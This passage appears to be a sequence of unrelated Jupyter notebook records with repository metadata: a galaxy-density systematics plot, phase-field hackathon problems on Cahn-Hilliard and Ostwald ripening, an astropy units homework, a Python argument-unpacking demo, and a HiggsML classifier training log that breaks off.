sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hrn2[0]/norm2,'r:')\nnorm3 = 
sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hrn3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_G*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.show()", "_____no_output_____" ] ] ]
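A note on the pattern used throughout the cells of this notebook: every systematics test is the same operation — histogram the galaxies and the randoms against an imaging property (extinction-corrected depth, seeing, E(B-V), stellar density, ln(HI)), optionally weight the galaxies by 1/efficiency and a stellar-density term, and plot the normalized ratio. A minimal, self-contained sketch of that operation follows; the function name and the error treatment (square root of the weighted counts, as in the cells above) are illustrative rather than taken from any library.

```python
import numpy as np

def relative_density(gal_prop, ran_prop, gal_weights=None, bins=10, rng=None):
    """Relative target density versus an imaging property.

    gal_prop, ran_prop : property value per galaxy / per random point
    gal_weights        : optional per-galaxy corrections, e.g. 1/efficiency
                         times a stellar-density weight
    """
    hg, edges = np.histogram(gal_prop, bins=bins, range=rng, weights=gal_weights)
    hr, _ = np.histogram(ran_prop, bins=edges)
    norm = hg.sum() / hr.sum()                      # force the mean ratio to 1
    centers = 0.5 * (edges[:-1] + edges[1:])
    ratio = hg / hr / norm
    err = np.sqrt(hg) / hr / norm                   # approximate Poisson error
    return centers, ratio, err
```

Bins with no randoms produce divide-by-zero warnings, which is also what the notebook's own cells show when a histogram range extends past the footprint.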
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1c08ac68f7b33737dd42eb6053c2daf8c12af3
35,514
ipynb
Jupyter Notebook
hackathon1/problems.ipynb
dschwen/chimad-phase-field
a7248ee5af896719d8b604faaa2781bdbd8cbe64
[ "MIT" ]
null
null
null
hackathon1/problems.ipynb
dschwen/chimad-phase-field
a7248ee5af896719d8b604faaa2781bdbd8cbe64
[ "MIT" ]
null
null
null
hackathon1/problems.ipynb
dschwen/chimad-phase-field
a7248ee5af896719d8b604faaa2781bdbd8cbe64
[ "MIT" ]
null
null
null
51.025862
5,186
0.567945
[ [ [ "from IPython.display import HTML\n\nHTML('''<script>\ncode_show=true; \nfunction code_toggle() {\n if (code_show){\n $('div.input').hide();\n $('div.prompt').hide();\n } else {\n $('div.input').show();\n$('div.prompt').show();\n }\n code_show = !code_show\n} \n$( document ).ready(code_toggle);\n</script>\n<form action=\"javascript:code_toggle()\"><input type=\"submit\" value=\"Code Toggle\"></form>''')", "_____no_output_____" ] ], [ [ "# Table of Contents\n* [Challenge Problems](#Challenge-Problems)\n\t* [1. Spinodal Decomposition - Cahn-Hilliard](#1.-Spinodal-Decomposition---Cahn-Hilliard)\n\t\t* [Parameter Values](#Parameter-Values)\n\t\t* [Initial Conditions](#Initial-Conditions)\n\t\t* [Domains](#Domains)\n\t\t\t* [a. Square Periodic](#a.-Square-Periodic)\n\t\t\t* [b. No Flux](#b.-No-Flux)\n\t\t\t* [c. T-Shape No Flux](#c.-T-Shape-No-Flux)\n\t\t\t* [d. Sphere](#d.-Sphere)\n\t\t* [Tasks](#Tasks)\n\t* [2. Ostwald Ripening -- coupled Cahn-Hilliard and Allen-Cahn equations](#2.-Ostwald-Ripening----coupled-Cahn-Hilliard-and-Allen-Cahn-equations)\n\t\t* [Parameter Values](#Parameter-Values)\n\t\t* [Initial Conditions](#Initial-Conditions)\n\t\t* [Domains](#Domains)\n\t\t\t* [a. Square Periodic](#a.-Square-Periodic)\n\t\t\t* [b. No Flux](#b.-No-Flux)\n\t\t\t* [c. T-Shape No Flux](#c.-T-Shape-No-Flux)\n\t\t\t* [d. Sphere](#d.-Sphere)\n\t\t* [Tasks](#Tasks)\n", "_____no_output_____" ], [ "# Challenge Problems", "_____no_output_____" ], [ "For the first hackathon there are two challenge problems, a spinodal decomposition problem and an Ostwald ripening problem. The only solutions included here currently are with FiPy.", "_____no_output_____" ], [ "## 1. Spinodal Decomposition - Cahn-Hilliard", "_____no_output_____" ], [ "The free energy density is given by,\n\n$$ f = f_0 \\left[ c \\left( \\vec{r} \\right) \\right] + \\frac{\\kappa}{2} \\left| \\nabla c \\left( \\vec{r} \\right) \\right|^2 $$\n\nwhere $f_0$ is the bulk free energy density given by,\n\n$$ f_0\\left[ c \\left( \\vec{r} \\right) \\right] =\n - \\frac{A}{2} \\left(c - c_m\\right)^2\n + \\frac{B}{4} \\left(c - c_m\\right)^4\n + \\frac{c_{\\alpha}}{4} \\left(c - c_{\\alpha} \\right)^4\n + \\frac{c_{\\beta}}{4} \\left(c - c_{\\beta} \\right)^4 $$\n\nwhere $c_m = \\frac{1}{2} \\left( c_{\\alpha} + c_{\\beta} \\right)$ and $c_{\\alpha}$ and $c_{\\beta}$ are the concentrations at which the bulk free energy density has minima (corresponding to the solubilities in the matrix phase and the second phase, respectively).\n\nThe time evolution of the concentration field, $c$, is given by the Cahn-Hilliard equation:\n\n$$ \\frac{\\partial c}{\\partial t} = \\nabla \\cdot \\left[\n D \\left( c \\right) \\nabla \\left( \\frac{ \\partial f_0 }{ \\partial c} - \\kappa \\nabla^2 c \\right)\n \\right] $$\n\nwhere $D$ is the diffusivity.", "_____no_output_____" ], [ "### Parameter Values", "_____no_output_____" ], [ "Use the following parameter values.\n\n<table width=\"200\">\n<tr>\n<td> $c_{\\alpha}$ </td>\n<td> 0.05 </td>\n</tr>\n<tr>\n<td> $c_{\\beta}$ </td>\n<td> 0.95 </td>\n</tr>\n<tr>\n<td> A </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\kappa$ </td>\n<td> 2.0 </td>\n</tr>\n</table>\n\nwith\n\n$$ B = \\frac{A}{\\left( c_{\\alpha} - c_m \\right)^2} $$\n\n$$ D = D_{\\alpha} = D_{\\beta} = \\frac{2}{c_{\\beta} - c_{\\alpha}} $$", "_____no_output_____" ], [ "### Initial Conditions", "_____no_output_____" ], [ "Set $c\\left(\\vec{r}, t\\right)$ such that\n\n$$ c\\left(\\vec{r}, 0\\right) = \\bar{c}_0 + \\epsilon \\cos \\left( \\vec{q} \\cdot 
\\vec{r} \\right) $$\n\nwhere\n\n<table width=\"200\">\n<tr>\n<td> $\\bar{c}_0$ </td>\n<td> 0.45 </td>\n</tr>\n<tr>\n<td> $\\vec{q}$ </td>\n<td> $\\left(\\sqrt{2},\\sqrt{3}\\right)$ </td>\n</tr>\n<tr>\n<td> $\\epsilon$ </td>\n<td> 0.01 </td>\n</tr>\n</table>", "_____no_output_____" ], [ "### Domains", "_____no_output_____" ], [ "#### a. Square Periodic", "_____no_output_____" ], [ "2D square domain with $L_x = L_y = 200$ and periodic boundary conditions.", "_____no_output_____" ] ], [ [ "from IPython.display import SVG\nSVG(filename='../images/block1.svg')", "_____no_output_____" ] ], [ [ "#### b. No Flux", "_____no_output_____" ], [ "2D square domain with $L_x = L_y = 200$ and zero flux boundary conditions.", "_____no_output_____" ], [ "#### c. T-Shape No Flux", "_____no_output_____" ], [ "T-shaped reiong with zero flux boundary conditions with $a=b=100$ and $c=d=20.$", "_____no_output_____" ] ], [ [ "from IPython.display import SVG\nSVG(filename='../images/t-shape.svg')", "_____no_output_____" ] ], [ [ "#### d. Sphere", "_____no_output_____" ], [ "Domain is the surface of a sphere with radius 100, but with initial conditions of\n\n$$ c\\left(\\theta, \\phi, 0\\right) = \\bar{c}_0 + \\epsilon \\cos \\left( \\sqrt{233} \\theta \\right)\n \\sin \\left( \\sqrt{239} \\phi \\right) $$\n\nwhere $\\theta$ and $\\phi$ are the polar and azimuthal angles in a spherical coordinate system. $\\bar{c}_0$ and $\\epsilon$ are given by the values in the table above.", "_____no_output_____" ], [ "### Tasks", "_____no_output_____" ], [ "Your task for each domain,\n\n 1. Calculate the time evolution of the concentration -- store concentration at time steps to make a movie\n\n 2. Plot the free energy as a function of time steps until you judge that convergence or a local equilibrium has been reached.\n\n 3. Present wall clock time for the calculations, and wall clock time per core used in the calculation.\n\n 4. For domain a. above, demonstrate that the solution is robust with respect to meshing by refining the mesh (e.g. reduce the mesh size by about a factor of $\\sqrt{2}$ in linear dimensions -- use whatever convenient way you have to refine the mesh without exploding the computational time).", "_____no_output_____" ], [ "## 2. Ostwald Ripening -- coupled Cahn-Hilliard and Allen-Cahn equations", "_____no_output_____" ], [ "Expanded problem in that the phase field, described by variables $\\eta_i$, is now coupled to the concentration field $c$. The Ginzberg-Landau free energy density is now taken to be,\n\n$$ f = f_0 \\left[ C \\left( \\vec{r} \\right), \\eta_1, ... , \\eta_p \\right]\n+ \\frac{\\kappa_C}{2} \\left[ \\nabla C \\left( \\vec{r} \\right) \\right]^2 +\n\\sum_{i=1}^p \\frac{\\kappa_C}{2} \\left[ \\nabla \\eta_i \\left( \\vec{r} \\right) \\right]^2\n$$\n\nHere, $f_0$ is a bulk free energy density,\n\n$$ f_0 \\left[ C \\left( \\vec{r} \\right), \\eta_1, ... , \\eta_p \\right] \n= f_1 \\left( C \\right) + \\sum_{i=1}^p f_2 \\left( C, \\eta_i \\right)\n+ \\sum_{i=1}^p \\sum_{j\\ne i}^p f_3 \\left( \\eta_j, \\eta_i \\right) $$\n\nHere, $ f_1 \\left( C \\right) $ is the free energy density due to the concentration field, $C$, with local minima at $C_{\\alpha}$ and $C_{\\beta}$ corresponding to the solubilities in the matrix phase and the second phase, respectively; $f_2\\left(C , \\eta_i \\right)$ is an interaction term between the concentration field and the phase fields, and $f_3 \\left( \\eta_i, \\eta_j \\right)$ is the free energy density of the phase fields. 
Simple models for these free energy densities are,\n\n$$ f_1\\left( C \\right) =\n - \\frac{A}{2} \\left(C - C_m\\right)^2\n + \\frac{B}{4} \\left(C - C_m\\right)^4\n + \\frac{D_{\\alpha}}{4} \\left(C - C_{\\alpha} \\right)^4\n + \\frac{D_{\\beta}}{4} \\left(C - C_{\\beta} \\right)^4 $$\n\nwhere \n\n$$ C_m = \\frac{1}{2} \\left(C_{\\alpha} + C_{\\beta} \\right) $$\n\nand\n\n$$ f_2 \\left( C, \\eta_i \\right) = - \\frac{\\gamma}{2} \\left( C - C_{\\alpha} \\right)^2 \\eta_i^2 + \\frac{\\beta}{2} \\eta_i^4 $$\n\nwhere\n\n$$ f_3 \\left( \\eta_i, \\eta_j \\right) = \\frac{ \\epsilon_{ij} }{2} \\eta_i^2 \\eta_j^2, i \\ne j $$\n\nThe time evolution of the system is now given by coupled Cahn-Hilliard and Allen-Cahn (time dependent Gizberg-Landau) equations for the conserved concentration field and the non-conserved phase fields:\n\n$$\n\\begin{eqnarray}\n\\frac{\\partial C}{\\partial t} &=& \\nabla \\cdot \\left \\{\n D \\nabla \\left[ \\frac{\\delta F}{\\delta C} \\right] \\right \\} \\\\\n &=& D \\left[ -A + 3 B \\left( C- C_m \\right)^2 + 3 D_{\\alpha} \\left( C - C_{\\alpha} \\right)^2 + 3 D_{\\beta} \\left( C - C_{\\beta} \\right)^2 \\right] \\nabla^2 C \\\\\n& & -D \\gamma \\sum_{i=1}^{p} \\left[ \\eta_i^2 \\nabla^2 C + 4 \\nabla C \\cdot \\nabla \\eta_i + 2 \\left( C - C_{\\alpha} \\right) \\nabla^2 \\eta_i \\right] - D \\kappa_C \\nabla^4 C\n\\end{eqnarray}\n$$\n\nand the phase field equations\n\n$$\n\\begin{eqnarray}\n\\frac{\\partial \\eta_i}{\\partial t} &=& - L_i \\frac{\\delta F}{\\delta \\eta_i} \\\\\n &=& \\frac{\\partial f_2}{\\delta \\eta_i} + \\frac{\\partial f_3}{\\delta \\eta_i} - \\kappa_i \\nabla^2 \\eta_i \\left(\\vec{r}, t\\right) \\\\\n &=& L_i \\gamma \\left( C - C_{\\alpha} \\right)^2 \\eta_i - L_i \\beta \\eta_i^3 - L_i \\eta_i \\sum_{j\\ne i}^{p} \\epsilon_{ij} \\eta^2_j + L_i \\kappa_i \\nabla^2 \\eta_i\n\\end{eqnarray}\n$$", "_____no_output_____" ], [ "### Parameter Values", "_____no_output_____" ], [ "Use the following parameter values.\n\n<table width=\"200\">\n<tr>\n<td> $C_{\\alpha}$ </td>\n<td> 0.05 </td>\n</tr>\n<tr>\n<td> $C_{\\beta}$ </td>\n<td> 0.95 </td>\n</tr>\n<tr>\n<td> A </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\kappa_i$ </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\kappa_j$ </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\kappa_k$ </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\epsilon_{ij}$ </td>\n<td> 3.0 </td>\n</tr>\n<tr>\n<td> $\\beta$ </td>\n<td> 1.0 </td>\n</tr>\n<tr>\n<td> $p$ </td>\n<td> 10 </td>\n</tr>\n</table>\n\nwith\n\n$$ B = \\frac{A}{\\left( C_{\\alpha} - C_m \\right)^2} $$\n\n$$ \\gamma = \\frac{2}{\\left(C_{\\beta} - C_{\\alpha}\\right)^2} $$\n\n$$ D = D_{\\alpha} = D_{\\beta} = \\frac{\\gamma}{\\delta^2} $$\n\nThe diffusion coefficient, $D$, is constant and isotropic and the same (unity) for both phases; the mobility-related constants, $L_i$, are the same (unity) for all phase fields.", "_____no_output_____" ], [ "### Initial Conditions", "_____no_output_____" ], [ "Set $c\\left(\\vec{r}, t\\right)$ such that\n\n$$ \n\\begin{eqnarray}\nc\\left(\\vec{r}, 0\\right) &=& \\bar{c}_0 + \\epsilon \\cos \\left( \\vec{q} \\cdot \\vec{r} \\right) \\\\\n\\eta_i\\left(\\vec{r}, 0\\right) &=& \\bar{\\eta}_0 + 0.01 \\epsilon_i \\cos^2 \\left( \\vec{q} \\cdot \\vec{r} \\right)\n\\end{eqnarray}\n$$\n\nwhere\n\n<table width=\"200\">\n<tr>\n<td> $\\bar{c}_0$ </td>\n<td> 0.5 </td>\n</tr>\n<tr>\n<td> $\\vec{q}$ </td>\n<td> $\\left(\\sqrt{2},\\sqrt{3}\\right)$ </td>\n</tr>\n<tr>\n<td> $\\epsilon$ </td>\n<td> 0.01 </td>\n</tr>\n<tr>\n<td> $\\vec{q}_i$ </td>\n<td> 
$\\left( \\sqrt{23 + i}, \\sqrt{149 + i} \\right)$ </td>\n</tr>\n<tr>\n<td> $\\epsilon_i$ </td>\n<td> 0.979285, 0.219812,\t0.837709,\t0.695603, \t0.225115,\t\n0.389266, \t0.585953,\t0.614471, \t0.918038,\t0.518569 </td>\n</tr>\n<tr>\n<td> $\\eta_0$ </td>\n<td> 0.0 </td>\n</tr>\n</table>", "_____no_output_____" ], [ "### Domains", "_____no_output_____" ], [ "#### a. Square Periodic", "_____no_output_____" ], [ "2D square domain with $L_x = L_y = 200$ and periodic boundary conditions.", "_____no_output_____" ] ], [ [ "from IPython.display import SVG\nSVG(filename='../images/block1.svg')", "_____no_output_____" ] ], [ [ "#### b. No Flux", "_____no_output_____" ], [ "2D square domain with $L_x = L_y = 200$ and zero flux boundary conditions.", "_____no_output_____" ], [ "#### c. T-Shape No Flux", "_____no_output_____" ], [ "T-shaped reiong with zero flux boundary conditions with $a=b=100$ and $c=d=20.$", "_____no_output_____" ] ], [ [ "from IPython.display import SVG\nSVG(filename='../images/t-shape.svg')", "_____no_output_____" ] ], [ [ "#### d. Sphere", "_____no_output_____" ], [ "Domain is the surface of a sphere with radius 100, but with initial conditions of\n\n$$ c\\left(\\theta, \\phi, 0\\right) = \\bar{c}_0 + \\epsilon \\cos \\left( \\sqrt{233} \\theta \\right)\n \\sin \\left( \\sqrt{239} \\phi \\right) $$\n\nand\n\n$$ \\eta_i\\left(\\theta, \\phi, 0\\right) = \\bar{\\eta}_0 + 0.01 \\epsilon_i \\cos^2 \\left( \\sqrt{23 + i} \\theta \\right)\n \\sin^2 \\left( \\sqrt{149 + i} \\phi \\right) $$\n\nwhere $\\theta$ and $\\phi$ are the polar and azimuthal angles in a spherical coordinate system and parameter values are in the table above.", "_____no_output_____" ], [ "### Tasks", "_____no_output_____" ], [ "Your task for each domain,\n\n 1. Calculate the time evolution of the concentration -- store concentration at time steps to make a movie\n\n 2. Plot the free energy as a function of time steps until you judge that convergence or a local equilibrium has been reached.\n\n 3. Present wall clock time for the calculations, and wall clock time per core used in the calculation.", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ] ]
cb1c08e90560a37de4d323ad41e054583cb670e8
8,490
ipynb
Jupyter Notebook
FirstLast_HW4.ipynb
UWashington-Astro300/Astro300-W17
ad071877ecc859c3cd2d151929235990fc0297ee
[ "MIT" ]
null
null
null
FirstLast_HW4.ipynb
UWashington-Astro300/Astro300-W17
ad071877ecc859c3cd2d151929235990fc0297ee
[ "MIT" ]
null
null
null
FirstLast_HW4.ipynb
UWashington-Astro300/Astro300-W17
ad071877ecc859c3cd2d151929235990fc0297ee
[ "MIT" ]
null
null
null
23.715084
282
0.545583
[ [ [ "# First Last - Homework 4", "_____no_output_____" ], [ "* Use the `Astropy` units and constants packages to solve the following problems.\n* Do not hardcode any constants!\n* Unless asked, your units should be in the simplest SI units possible", "_____no_output_____" ] ], [ [ "import numpy as np\n\nfrom astropy import units as u\nfrom astropy import constants as const\nfrom astropy.units import imperial\nimperial.enable()", "_____no_output_____" ] ], [ [ "### Impulse is a change in momentum\n\n$$ I = \\Delta\\ p\\ =\\ m\\Delta v $$", "_____no_output_____" ], [ "**Problem 1** - Calculate the $\\Delta$v that would be the result of an impuse of 700 (N * s) for M = 338 kg.", "_____no_output_____" ], [ "**Problem 2** - Calculate the $\\Delta$v that would be the result of an impuse of 700 (lbf * s) for M = 338 kg.", "_____no_output_____" ], [ "This is the unit conversion error that doomed the [Mars Climate Orbiter](https://en.wikipedia.org/wiki/Mars_Climate_Orbiter)", "_____no_output_____" ], [ "### The range of a projectile launched with a velocity (v) at and angle ($\\theta$) is\n\n$$R\\ =\\ {v^2 \\over g}\\ sin(2\\theta)$$", "_____no_output_____" ], [ "**Problem 3** - Find R for v = 123 mph and $\\theta$ = 1000 arc minutes", "_____no_output_____" ], [ "**Problem 4** - How fast to you have to throw a football at 33.3 degrees so that is goes exactly 100 yards? Express your answer in mph", "_____no_output_____" ], [ "### Kepler's third law can be expressed as:\n\n$$ T^2 = \\left( {{4\\pi^2} \\over {GM}} \\right)\\ r^3 $$\n\nWhere **T** is the orbial period of an object at distance (**r**) around a central object of mass (**M**).\n\nIt assumes the mass of the orbiting object is small compared to the mass of the central object.", "_____no_output_____" ], [ "**Problem 5** - Calculate the orbital period of HST. HST orbits 353 miles above the **surface** of the Earth. Expess your answer in minutes.", "_____no_output_____" ], [ "** Problem 6 ** - An exoplanet orbits the star Epsilon Tauri in 595 days at a distance of 1.93 AU. Calculate the mass of Epsilon Tauri in terms of solar masses.", "_____no_output_____" ], [ "### The velocity of an object in orbit is\n\n$$ v=\\sqrt{GM\\over r} $$\n\nWhere the object is at a distance (**r**) around a central object of mass (**M**).", "_____no_output_____" ], [ "**Problem 7** - Calculate the velocity of HST. Expess your answer in km/s and mph.", "_____no_output_____" ], [ "**Problem 8** - The Procliamer's song [500 miles](https://youtu.be/MJuyn0WAYNI?t=27s) has a duration of 3 minutes and 33 seconds. Calculate at what altitude, above the Earth's surface, you would have to orbit to go 1000 miles in this time. 
Express your answer in km and miles.", "_____no_output_____" ], [ "### The Power being received by a solar panel in space can be expressed as:\n\n$$ I\\ =\\ {{L_{\\odot}} \\over {4 \\pi d^2}}\\ \\varepsilon$$\n\nWhere **I** is the power **per unit area** at a distance (**d**) from the Sun, and $\\varepsilon$ is the efficiency of the solar panel.\n\nThe solar panels that power spacecraft have an efficiency of about 40%.", "_____no_output_____" ], [ "** Problem 9 ** - The [New Horizons](http://pluto.jhuapl.edu/) spacecraft requires 220 Watts of power.\n\nCalculate the area of a solar panel that would be needed to power New Horizons at a distance of 1 AU from the Sun.", "_____no_output_____" ], [ "** Problem 10 ** - Express your answer in units of the area of a piece of US letter sized paper (8.5 in x 11 in).", "_____no_output_____" ], [ "** Problem 11 ** - Same question as above but now a d = 30 AU.\n\nExpress you answer in both sq meters and US letter sized paper", "_____no_output_____" ], [ "** Problem 12 ** - The main part of the Oort cloud is thought to be at a distance of about 10,000 AU.\n\nCalculate the size of the solar panel New Horizons would need to operate in the Oort cloud.\n\nExpress your answer in units of the area of an American football field (120 yd x 53.3 yd).", "_____no_output_____" ], [ "** Problem 13 ** - Calculate the maximum distance from the Sun where a solar panel of 1 football field can power the New Horizons spacecraft. Express your answer in AU.", "_____no_output_____" ], [ "### Due Tue Jan 31 - 5pm\n- `Make sure to change the filename to your name!`\n- `Make sure to change the Title to your name!`\n- `File -> Download as -> HTML (.html)`\n- `upload your .html and .ipynb file to the class Canvas page` ", "_____no_output_____" ] ] ]
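Most of the problems in this homework notebook reduce to writing the quoted formula with `astropy` quantities and letting `.to()` handle the unit conversion. As one hedged example (a sketch, not the official solution set), the HST problems with Kepler's third law and the orbital speed look like this:

```python
import numpy as np
from astropy import units as u
from astropy import constants as const
from astropy.units import imperial
imperial.enable()

# T^2 = (4 pi^2 / (G M)) r^3 for an orbit 353 miles above the Earth's surface
r = const.R_earth + 353 * imperial.mi
T = np.sqrt(4 * np.pi ** 2 * r ** 3 / (const.G * const.M_earth))
print(T.to(u.min))                     # orbital period in minutes

# v = sqrt(G M / r), expressed in km/s and in mph
v = np.sqrt(const.G * const.M_earth / r)
print(v.to(u.km / u.s))
print(v.to(imperial.mi / u.hr))
```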
[ "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1c0dd292aa7ca82f4d26866cfe872785074d35
1,479
ipynb
Jupyter Notebook
ml_repo/1. Python Programming/Python Functions.ipynb
sachinpr0001/data_science
d028233ff7bbcbbb6b26f01806d1c5ccf788df9a
[ "MIT" ]
null
null
null
ml_repo/1. Python Programming/Python Functions.ipynb
sachinpr0001/data_science
d028233ff7bbcbbb6b26f01806d1c5ccf788df9a
[ "MIT" ]
null
null
null
ml_repo/1. Python Programming/Python Functions.ipynb
sachinpr0001/data_science
d028233ff7bbcbbb6b26f01806d1c5ccf788df9a
[ "MIT" ]
null
null
null
19.207792
79
0.448952
[ [ [ "def fun(a,b,*x,**y):\n print(a)\n print(b)\n print(x)\n print(type(x))\n print(y)\n print(type(y))\n \n for k in y:\n print(k,y[k])\n \n \nfun(1,2,3,4,10,14,shake=\"OreoShake\",drink=\"lemonade\",fruit=\"Mango\")", "1\n2\n(3, 4, 10, 14)\n<class 'tuple'>\n{'shake': 'OreoShake', 'drink': 'lemonade', 'fruit': 'Mango'}\n<class 'dict'>\nshake OreoShake\ndrink lemonade\nfruit Mango\n" ] ] ]
[ "code" ]
[ [ "code" ] ]
cb1c0dd70bc4bdedcfa1dda4582006b803102d39
542,855
ipynb
Jupyter Notebook
Notebooks/6_Model_SWA_Augmentation.ipynb
GilesStrong/QCHS-2018
80d932b2d1a8a2f1f0b2f3f024d6999e20dbef33
[ "MIT" ]
4
2018-08-03T23:42:08.000Z
2019-04-24T11:04:44.000Z
Notebooks/6_Model_SWA_Augmentation.ipynb
GilesStrong/QCHS-2018
80d932b2d1a8a2f1f0b2f3f024d6999e20dbef33
[ "MIT" ]
null
null
null
Notebooks/6_Model_SWA_Augmentation.ipynb
GilesStrong/QCHS-2018
80d932b2d1a8a2f1f0b2f3f024d6999e20dbef33
[ "MIT" ]
2
2019-02-12T12:15:53.000Z
2019-03-25T15:00:23.000Z
104.154835
214,808
0.818778
[ [ [ "# Swish-based classifier with data augmentation and stochastic weght-averaging\n- Swish activation, 4 layers, 100 neurons per layer\n- Data is augmentaed via phi rotations, and transvers and longitudinal flips\n- Model uses a running average of previous weights\n- Validation score use ensemble of 10 models weighted by loss", "_____no_output_____" ], [ "### Import modules", "_____no_output_____" ] ], [ [ "%matplotlib inline\nfrom __future__ import division\nimport sys\nimport os\nsys.path.append('../')\nfrom Modules.Basics import *\nfrom Modules.Class_Basics import *", "/home/giles/anaconda3/lib/python3.6/site-packages/h5py/__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\n from ._conv import register_converters as _register_converters\n/home/giles/anaconda3/lib/python3.6/site-packages/statsmodels/compat/pandas.py:56: FutureWarning: The pandas.core.datetools module is deprecated and will be removed in a future version. Please use the pandas.tseries module instead.\n from pandas.core import datetools\nUsing TensorFlow backend.\n" ] ], [ [ "## Options", "_____no_output_____" ] ], [ [ "with open(dirLoc + 'features.pkl', 'rb') as fin:\n classTrainFeatures = pickle.load(fin)", "_____no_output_____" ], [ "nSplits = 10\npatience = 50\nmaxEpochs = 200\n\nensembleSize = 10\nensembleMode = 'loss'\n\ncompileArgs = {'loss':'binary_crossentropy', 'optimizer':'adam'}\ntrainParams = {'epochs' : 1, 'batch_size' : 256, 'verbose' : 0}\nmodelParams = {'version':'modelSwish', 'nIn':len(classTrainFeatures), 'compileArgs':compileArgs, 'mode':'classifier'}\n\nprint (\"\\nTraining on\", len(classTrainFeatures), \"features:\", [var for var in classTrainFeatures])", "\nTraining on 31 features: ['DER_mass_MMC', 'DER_mass_transverse_met_lep', 'DER_mass_vis', 'DER_pt_h', 'DER_deltaeta_jet_jet', 'DER_mass_jet_jet', 'DER_prodeta_jet_jet', 'DER_deltar_tau_lep', 'DER_pt_tot', 'DER_sum_pt', 'DER_pt_ratio_lep_tau', 'DER_met_phi_centrality', 'DER_lep_eta_centrality', 'PRI_met_pt', 'PRI_met_sumet', 'PRI_jet_num', 'PRI_jet_all_pt', 'PRI_tau_px', 'PRI_tau_py', 'PRI_tau_pz', 'PRI_lep_px', 'PRI_lep_py', 'PRI_lep_pz', 'PRI_jet_leading_px', 'PRI_jet_leading_py', 'PRI_jet_leading_pz', 'PRI_jet_subleading_px', 'PRI_jet_subleading_py', 'PRI_jet_subleading_pz', 'PRI_met_px', 'PRI_met_py']\n" ] ], [ [ "## Import data", "_____no_output_____" ] ], [ [ "with open(dirLoc + 'inputPipe.pkl', 'rb') as fin:\n inputPipe = pickle.load(fin)", "_____no_output_____" ], [ "trainData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'train.hdf5', \"r+\"),\n inputPipe=inputPipe, augRotMult=16)", "_____no_output_____" ] ], [ [ "## Determine LR", "_____no_output_____" ] ], [ [ "lrFinder = batchLRFind(trainData, getModel, modelParams, trainParams,\n lrBounds=[1e-5,1e-1], trainOnWeights=True, verbose=0)", "2 classes found, running in binary mode\n\n" ] ], [ [ "## Train classifier", "_____no_output_____" ] ], [ [ "results, histories = batchTrainClassifier(trainData, nSplits, getModel, \n {**modelParams, 'compileArgs':{**compileArgs, 'lr':2e-3}},\n trainParams, trainOnWeights=True, maxEpochs=maxEpochs,\n swaStart=125, swaRenewal=-1,\n patience=patience, verbose=1, amsSize=250000)", "Training using weights\nRunning fold 1 / 10\n2 classes found, running in binary mode\n\n1 New best found: 3.8324186580732575e-05\n2 New best found: 3.7469157104559623e-05\n3 New best found: 3.6876136355998674e-05\n4 
New best found: 3.543037565955778e-05\n6 New best found: 3.5032572314542355e-05\n7 New best found: 3.4872763021548655e-05\n8 New best found: 3.485711923319024e-05\n9 New best found: 3.439738119348264e-05\n11 New best found: 3.428611103207681e-05\n12 New best found: 3.402505283530772e-05\n14 New best found: 3.4012628727319535e-05\n16 New best found: 3.376790851863805e-05\n19 New best found: 3.370774209442384e-05\n20 New best found: 3.35804229767278e-05\n27 New best found: 3.336912276656435e-05\n28 New best found: 3.3106097036002034e-05\n41 New best found: 3.300400146347483e-05\n47 New best found: 3.298249243327946e-05\n48 New best found: 3.279903765427508e-05\n50 New best found: 3.2782877783929946e-05\n65 New best found: 3.268424417499816e-05\n67 New best found: 3.264187868025979e-05\n74 New best found: 3.2627491190936e-05\n94 New best found: 3.253126695226105e-05\n98 New best found: 3.250455119086954e-05\n104 New best found: 3.244058855133024e-05\n106 New best found: 3.243724077301324e-05\nSWA beginning\nmodel is 0 epochs old\n125 swa loss 3.284072900850413e-05, default loss 3.284072900850413e-05\nmodel is 1 epochs old\nnew model is 1 epochs old\n126 swa loss 3.233631254252461e-05, default loss 3.257266895116075e-05\n126 New best found: 3.233631254252461e-05\nmodel is 2 epochs old\nnew model is 2 epochs old\n127 swa loss 